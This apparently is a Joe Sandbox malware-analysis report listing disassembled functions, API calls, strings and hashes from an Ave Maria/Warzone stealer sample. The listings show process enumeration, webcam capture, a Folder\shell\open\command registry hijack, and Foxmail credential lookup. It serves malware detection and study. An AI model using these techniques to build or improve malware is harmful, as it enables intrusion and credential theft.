                                                                            • Opcode Fuzzy Hash: 197b1eab860f4328633b0e86db24ba8e6b1ce42e5468651c0bef0677bebd7986
                                                                            • Instruction Fuzzy Hash: C4F0B472240310BBD7214BA5AC8DEEB7EBCEB8DB50B104175F701A2140DAB48D009668
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405DE9 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 20libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(USER32.DLL,?,00411800,?,77C30770,00000000), ref: 00405DF1
                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405DFD
                                                                            • ExitProcess.KERNEL32 ref: 00405E21
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressExitLibraryLoadProcProcess
                                                                            • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                                                            • API String ID: 881411216-1361702557
                                                                            • Opcode ID: 665e447c18dd6cd14c29f9c8afe208bf82788663ec83304a93180c0f2cc759b1
                                                                            • Instruction ID: 25954cca20eb1c260ad7c814922471eb5b696a72d0fb51094525e610711aea92
                                                                            • Opcode Fuzzy Hash: 665e447c18dd6cd14c29f9c8afe208bf82788663ec83304a93180c0f2cc759b1
                                                                            • Instruction Fuzzy Hash: E5D017707C93003AEA1037A0AC4EFD737348B45B51F244462BA45A61D1C9E98986C9AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004122CA Relevance: 12.2, APIs: 8, Instructions: 164processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412310
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412329
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00412334
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            • OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 0041239E
                                                                            • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 004123D4
                                                                            • CloseHandle.KERNEL32(00000000,00000000,00417BA4), ref: 00412427
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0041248B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041249D
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$Process32lstrlen$CreateDispatcherExceptionFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32UserVirtuallstrcpy
                                                                            • String ID:
                                                                            • API String ID: 1221420079-0
                                                                            • Opcode ID: de69b770c700221928705f9a7865398ae7674968dd0ce11e7d06adbc952ac7be
                                                                            • Instruction ID: 76f310ec451ec7d85fc7bdc68f8874500a32d320933bf00d65e3e2fac8afd17e
                                                                            • Opcode Fuzzy Hash: de69b770c700221928705f9a7865398ae7674968dd0ce11e7d06adbc952ac7be
                                                                            • Instruction Fuzzy Hash: 86519472D00219ABCB10EBA5CD49AEF7B78AF54719F00017AF405B32D0DB789E85CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00412155 Relevance: 12.0, APIs: 8, Instructions: 45processstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412170
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412185
                                                                            • CharLowerW.USER32(00000000,?,00000000), ref: 0041218F
                                                                            • CharLowerW.USER32(?,00000000,?,00000000), ref: 0041219D
                                                                            • lstrcmpW.KERNEL32(00000000,?,00000000), ref: 004121A4
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 004121B6
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004121C1
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004121CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CharCloseHandleLowerProcess32$CreateFirstNextSnapshotToolhelp32lstrcmp
                                                                            • String ID:
                                                                            • API String ID: 1363071124-0
                                                                            • Opcode ID: 7127dcae3be97b314b06170a2d2ab854ee7541e6bcbe1cc0915e3935ee5c82da
                                                                            • Instruction ID: 4666fb41372ad6f73eaae79bd09a069f05ab8e19623d47d36fdabbe8d344061e
                                                                            • Opcode Fuzzy Hash: 7127dcae3be97b314b06170a2d2ab854ee7541e6bcbe1cc0915e3935ee5c82da
                                                                            • Instruction Fuzzy Hash: 9B018F71505224BBD711ABB4AC4CEDF7BBCEB09351F1481A1FA01D2290D77889928B7D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00414CB1 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 00414CC1
                                                                            • CoCreateInstance.OLE32(004175C0,00000000,00000001,0041A79C,?,?,?), ref: 00414CD9
                                                                            • CoCreateInstance.OLE32(00417610,00000000,00000001,0041A78C,?,?,?,004175A0,?,?,?), ref: 00414D33
                                                                              • Part of subcall function 00414A12: CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?,74B5B690,00000000,00000000,?,?,00414757), ref: 00414A40
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInstance$Initialize
                                                                            • String ID: Grabber$Source$vids
                                                                            • API String ID: 1108742289-4200688928
                                                                            • Opcode ID: a8aeeb8cf2cab8e24f88fce5b960f0a0a2b9a748dd8ec08587ead78164211a85
                                                                            • Instruction ID: c707b6f7033061667e34d12cbb2bfaee6e47a2410d4a0b7bdeab57eb5d8e2362
                                                                            • Opcode Fuzzy Hash: a8aeeb8cf2cab8e24f88fce5b960f0a0a2b9a748dd8ec08587ead78164211a85
                                                                            • Instruction Fuzzy Hash: 1C518A71600200AFDF14DF64C885E9A3BB6BF89715B2041ADFD05AF291CB79ED85CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00407A8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64sleepprocessmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,00000000,?,?), ref: 00407AB1
                                                                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00407ABF
                                                                            • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00407ACD
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00407B07
                                                                            • Sleep.KERNEL32(000003E8), ref: 00407B16
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocCreateDirectoryProcessSleepVirtualWindowslstrlen
                                                                            • String ID: \System32\cmd.exe
                                                                            • API String ID: 2560724043-2003734499
                                                                            • Opcode ID: b3de0a5e209d2120b9e275e8d83ec7119fedad0186483f74c4aeae4fe557b3e5
                                                                            • Instruction ID: 526d35256bd352fe19e6f9b51bef16261156da3b9883bb0cb5aadd8e9d8f3863
                                                                            • Opcode Fuzzy Hash: b3de0a5e209d2120b9e275e8d83ec7119fedad0186483f74c4aeae4fe557b3e5
                                                                            • Instruction Fuzzy Hash: E51170B1A4430DBBE710A7A9CC86FEF767CEB04748F000036F206B6191DA74AE0586A9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040906F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040907B
                                                                            • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 00409092
                                                                            • EnterCriticalSection.KERNEL32(0055A808,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040909E
                                                                            • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 004090AE
                                                                            • LeaveCriticalSection.KERNEL32(0055A808,?,00000000), ref: 00409101
                                                                              • Part of subcall function 00401F6D: CreateThread.KERNEL32 ref: 00401F82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                                                            • String ID: H/@
                                                                            • API String ID: 2964645253-3842538647
                                                                            • Opcode ID: 7251a566045f706d7ca5ef1436c7077981233550bcd5c9d1227c9b9e5285168c
                                                                            • Instruction ID: f99a12277a3120933ea65728b4e70e144b28dbd7bebc7df26f1967f06ae464e9
                                                                            • Opcode Fuzzy Hash: 7251a566045f706d7ca5ef1436c7077981233550bcd5c9d1227c9b9e5285168c
                                                                            • Instruction Fuzzy Hash: 9D017131A04205ABCB10AB65EC19BDB3FB9FB44716F00413BFA05A72D1C779544ACB96
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00412E2C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38registrystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(004131BE,00418FE6,?,?,004131BE,00418FE6,?), ref: 00412E34
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,004131BE,00418FE6,?), ref: 00412E51
                                                                            • SetLastError.KERNEL32(00000000,?,?,004131BE,00418FE6,?), ref: 00412E5C
                                                                            • RegSetValueExA.ADVAPI32(?,00418FE6,00000000,00000001,004131BE,00000000,?,?,004131BE,00418FE6,?), ref: 00412E74
                                                                            • RegCloseKey.ADVAPI32(?,?,?,004131BE,00418FE6,?), ref: 00412E7F
                                                                            Strings
                                                                            • Software\Classes\Folder\shell\open\command, xrefs: 00412E47
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseErrorLastOpenValuelstrlen
                                                                            • String ID: Software\Classes\Folder\shell\open\command
                                                                            • API String ID: 1613093083-2536721355
                                                                            • Opcode ID: 31a94de38354eca2784d2d112a83c47bf72bfd193ace401840464e10e3bc09ab
                                                                            • Instruction ID: ffd4354489f07140ccd769c490119bd97119082caabcfac067ebab19d0d729b9
                                                                            • Opcode Fuzzy Hash: 31a94de38354eca2784d2d112a83c47bf72bfd193ace401840464e10e3bc09ab
                                                                            • Instruction Fuzzy Hash: 0BF0CD35540318BBDF211FA09D09FDB3F79AB09790F108160F902A6160C2B58A61ABA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040F238 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,0040FC57,00000000), ref: 0040F254
                                                                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040F262
                                                                            • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 0040F273
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                            • API String ID: 667068680-2897241497
                                                                            • Opcode ID: 6eed301b0b0b6b1f2085c8ee6f635985884be4a7adf6b0daa38cad27219b9fb4
                                                                            • Instruction ID: fa32091ee75a1baed7f6170c370dd1564c17c489402f95e3a669c5805b8ffe79
                                                                            • Opcode Fuzzy Hash: 6eed301b0b0b6b1f2085c8ee6f635985884be4a7adf6b0daa38cad27219b9fb4
                                                                            • Instruction Fuzzy Hash: F6F0B4342443005FDB106F64FC289BA3BB8AE94B53300013EF806D3B60DB79DC499A19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040C30D Relevance: 9.1, APIs: 6, Instructions: 73filememoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000,?), ref: 0040C341
                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 0040C357
                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,?), ref: 0040C372
                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,?), ref: 0040C38A
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0040C3AD
                                                                              • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                                                              • Part of subcall function 0040C3B9: LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                                                              • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                                                              • Part of subcall function 0040C3B9: LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileLocal$AllocBinaryCryptString$CloseCreateFreeHandleReadSize
                                                                            • String ID:
                                                                            • API String ID: 4225742195-0
                                                                            • Opcode ID: 7808e07875b2e4740a3c85fc7c8b99c4ce96716a74113defd5bd93085088574c
                                                                            • Instruction ID: 02c412f26371b87ae011b2f5e9937fc2d134ed4a40de9b12e1d11bca91295adc
                                                                            • Opcode Fuzzy Hash: 7808e07875b2e4740a3c85fc7c8b99c4ce96716a74113defd5bd93085088574c
                                                                            • Instruction Fuzzy Hash: 3D119371610214EBCB219B65DC84AAF7BB8EF49750B10827AFD01E6290D7389D01CBA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040577F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 004057B6
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,77C30770,?,00405B8D,.bss,00000000), ref: 004034DA
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                                                              • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 00405806
                                                                            • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00405876
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                                                            • String ID: `$warzoneTURBO
                                                                            • API String ID: 3973575906-3455775371
                                                                            • Opcode ID: 5b0fa503b74e4d73b7da7f091c885055f59d37bef59ae2d3e3489ebf5b3acda2
                                                                            • Instruction ID: 35ac9e55f98b3bce9837d823b4f88ae1208dbfd8d39d165d9c06c2cd8671669a
                                                                            • Opcode Fuzzy Hash: 5b0fa503b74e4d73b7da7f091c885055f59d37bef59ae2d3e3489ebf5b3acda2
                                                                            • Instruction Fuzzy Hash: 06516E71910118AACB15FF62CC86CEFBB3CEF48755B00417AF815B61D2EA385B45CAA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402E27 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00410D2D: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D44
                                                                              • Part of subcall function 00410D2D: CoInitialize.OLE32(00000000), ref: 00410D4B
                                                                              • Part of subcall function 00410D2D: CoCreateInstance.OLE32(004174B0,00000000,00000017,00419CC8,?,?,?,?,?,?,?,?,?,00402E47), ref: 00410D69
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402E56
                                                                              • Part of subcall function 004134A2: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00415553), ref: 004134CF
                                                                              • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                                                              • Part of subcall function 004134A2: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00415553), ref: 004134F3
                                                                              • Part of subcall function 004134A2: FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000,?,?,00415553), ref: 00413500
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00410F3E: GlobalMemoryStatusEx.KERNEL32(?), ref: 00410F4F
                                                                              • Part of subcall function 0041119D: GetComputerNameW.KERNEL32 ref: 004111C0
                                                                              • Part of subcall function 00411177: GetCurrentProcess.KERNEL32(?,?,00402EBF,?,00417668,?,?,00000000,?,?,?), ref: 0041117B
                                                                              • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,77C30770,00000000,77C30770,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                                                              • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                                                              • Part of subcall function 0041111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                                                              • Part of subcall function 0041111B: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00411167
                                                                              • Part of subcall function 00410F61: LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410F79
                                                                              • Part of subcall function 00410F61: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410F89
                                                                              • Part of subcall function 004111D7: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0041121B
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 00402F1A
                                                                            • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 00402F2C
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00402F3A
                                                                              • Part of subcall function 0040906F: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040907B
                                                                              • Part of subcall function 0040906F: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 00409092
                                                                              • Part of subcall function 0040906F: EnterCriticalSection.KERNEL32(0055A808,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040909E
                                                                              • Part of subcall function 0040906F: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 004090AE
                                                                              • Part of subcall function 0040906F: LeaveCriticalSection.KERNEL32(0055A808,?,00000000), ref: 00409101
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalFileSection$CreateInitializeProcess$ChangeCloseCurrentFindModuleNameNotificationOpenTokenlstrlen$AddressComputerDeleteDirectoryDispatcherEnterExceptionFolderGlobalHandleInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatusUserlstrcat
                                                                            • String ID: \Microsoft Vision\
                                                                            • API String ID: 2654234449-1618823865
                                                                            • Opcode ID: f0dc2ad6ea702e7073f60f83b80db7d883d1c1c031e6252cb074b5a7b31379b8
                                                                            • Instruction ID: 851052fb16c6d29596c0b523666286a16417f9887d42e77abec1e0ca40aba6c7
                                                                            • Opcode Fuzzy Hash: f0dc2ad6ea702e7073f60f83b80db7d883d1c1c031e6252cb074b5a7b31379b8
                                                                            • Instruction Fuzzy Hash: 56318571A005197BCF14FBA2DC46DEEB77CAF44308F00046EB205B21D1DA7C5A858B99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00412049 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                                                            • MessageBoxA.USER32 ref: 0041208F
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 004120F8: CreateProcessW.KERNEL32 ref: 00412133
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 0041209D
                                                                            • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 004120CD
                                                                            • VirtualQuery, xrefs: 00412056
                                                                            • Bla2, xrefs: 00412086, 0041208C, 0041208D
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$CreateDispatcherExceptionFreeMessageProcessUserVirtuallstrcmp
                                                                            • String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
                                                                            • API String ID: 2449179951-2308542105
                                                                            • Opcode ID: c1a8e0905ddce624e254c314aa7376d4d1c8a05a845ad36d6c09a7f12f9aea55
                                                                            • Instruction ID: b002b8fab82c5f8035800c071d4aecb67a577e28dec50426e7e7b6f2e11e6f57
                                                                            • Opcode Fuzzy Hash: c1a8e0905ddce624e254c314aa7376d4d1c8a05a845ad36d6c09a7f12f9aea55
                                                                            • Instruction Fuzzy Hash: C2113D71A40119BACB08EBA5D956CEF7B7CAE08704B10416FB502B2181DF785F85D6A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040C5E8 Relevance: 8.8, APIs: 7, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C5FF
                                                                            • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C60A
                                                                            • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C615
                                                                            • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C620
                                                                            • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C62B
                                                                            • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C636
                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0040C25A), ref: 0040C639
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal
                                                                            • String ID:
                                                                            • API String ID: 2826327444-0
                                                                            • Opcode ID: e210eac78a67af8d765b371b2a8cef4c1561b11a820ce277a8fed05558fb2678
                                                                            • Instruction ID: 62e6c422cf591d6120044b1c94743719a7044ae546b32db2f753074c0c434ab8
                                                                            • Opcode Fuzzy Hash: e210eac78a67af8d765b371b2a8cef4c1561b11a820ce277a8fed05558fb2678
                                                                            • Instruction Fuzzy Hash: 6BF0EC30011B14DBD7326B26CC447A7B6A1BF80305F151E3AD08121AB0C77AA896DF48
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004094FF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 0040951A
                                                                            • RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,00426868,?), ref: 00409541
                                                                            • PathRemoveFileSpecA.SHLWAPI(00426868), ref: 0040954C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileOpenPathQueryRemoveSpecValue
                                                                            • String ID: Executable$software\Aerofox\FoxmailPreview
                                                                            • API String ID: 3687894118-2371247776
                                                                            • Opcode ID: 00374a71c6d41edaef1c2e71d7d119052920faecd5ef0eb5d90ed42a0cf43a85
                                                                            • Instruction ID: da810012986fcb6c8d8d394bbe01705385cba6e4fa72d30e5428379b1b1cd6da
                                                                            • Opcode Fuzzy Hash: 00374a71c6d41edaef1c2e71d7d119052920faecd5ef0eb5d90ed42a0cf43a85
